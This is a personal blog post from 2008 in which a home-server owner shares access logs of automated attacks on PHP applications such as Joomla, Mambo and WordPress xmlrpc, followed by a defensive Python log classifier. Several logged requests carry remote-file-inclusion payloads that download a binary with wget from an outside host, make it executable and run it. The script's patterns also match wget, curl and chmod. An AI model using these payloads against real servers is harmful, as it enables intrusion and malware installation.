2008/04/11

My home server is being attacked

 
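Lately, when I look at my home server's access logs, attacks targeting PHP vulnerabilities have increased quite a bit ( ´д`)

I suppose they're trying to break in.

Even though attacking it is pointless (´・ω・‘)

So here are the logs from a recent attack.

The IP address may be spoofed, so I'll do them the favor of masking it.

That said, if they want to know whether the break-in attempt worked, they have to receive the response, so it does seem certain that the attack is coming from this IP address.

Probably a proxy?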
 
------------------------------------------------------------
62.112.159.16x - - [11/Apr/2008:15:23:27 +0900] "POST /xmlrpc.php HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:29 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:30 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:31 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:32 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:34 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:35 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:36 +0900] "POST /xmlrpc.php HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:38 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:39 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:40 +0900] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:41 +0900] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:43 +0900] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:44 +0900] "GET /admin/business_inc/saveserver.php?thisdir=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:45 +0900] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:47 +0900] "GET /components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:48 +0900] "GET /administrator/component/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:49 +0900] "GET /component/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:50 +0900] "GET /com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:52 +0900] "GET /joomla/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:53 +0900] "GET /blog/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:54 +0900] "GET /forum/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:56 +0900] "GET /page/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
------------------------------------------------------------
 
 
Still, there have been a lot of access log entries targeting PHP vulnerabilities lately..

Almost every day, they come in with all sorts of patterns.
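
The two request patterns in the log above (POSTs to `xmlrpc.php` under guessed paths, and GETs that put a remote URL plus a `cmd=` string into a PHP parameter) can be picked out of an access log automatically. The following is an added example, not part of the original post: the function names and labels are made up for illustration, and the sample lines are constructed with documentation-range addresses.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined Log Format: client, request method, target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*?) HTTP/[\d.]+" (\d{3}) ')
# Query parameter whose value is a remote URL (remote file inclusion probe).
RFI_RE = re.compile(r'[?&][^=&]+=(?:https?|ftp)://', re.IGNORECASE)
# Shell-command markers in the decoded target, like the cmd= parameter in the log.
CMD_RE = re.compile(r'[?&]cmd=|\b(?:wget|curl|chmod)\s', re.IGNORECASE)

def classify(line):
    """Return (client, status, labels) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    decoded = unquote(target)
    labels = set()
    # On a site that really serves xmlrpc.php, allowlist that path first.
    if method == "POST" and decoded.split("?")[0].endswith("/xmlrpc.php"):
        labels.add("xmlrpc-probe")
    if RFI_RE.search(decoded):
        labels.add("rfi-attempt")
    if CMD_RE.search(decoded):
        labels.add("command-in-url")
    return client, int(status), labels

def summarize(lines):
    """Group findings per client; hits not answered with 404 are kept for review."""
    report = defaultdict(lambda: {"labels": set(), "hits": 0, "review": []})
    for line in lines:
        parsed = classify(line)
        if not parsed or not parsed[2]:
            continue
        client, status, labels = parsed
        entry = report[client]
        entry["labels"] |= labels
        entry["hits"] += 1
        if status != 404:
            entry["review"].append(line)
    return dict(report)

# Constructed sample lines (documentation addresses, not taken from the post).
SAMPLE = [
    '198.51.100.7 - - [11/Apr/2008:15:23:27 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [11/Apr/2008:15:23:44 +0900] "GET /admin/business_inc/saveserver.php?thisdir=http://192.0.2.10/cmd.gif?&cmd=id;echo%20YYY HTTP/1.1" 404 312 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [11/Apr/2008:15:23:45 +0900] "GET /index.php?option=com_content&mosConfig_absolute_path=http://192.0.2.10/cmd.gif? HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [11/Apr/2008:15:24:01 +0900] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/4.0"',
]
```

Every request in the pasted log was answered with 404, so the `review` list would stay empty for it; a flagged request with any other status is the one worth checking by hand.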
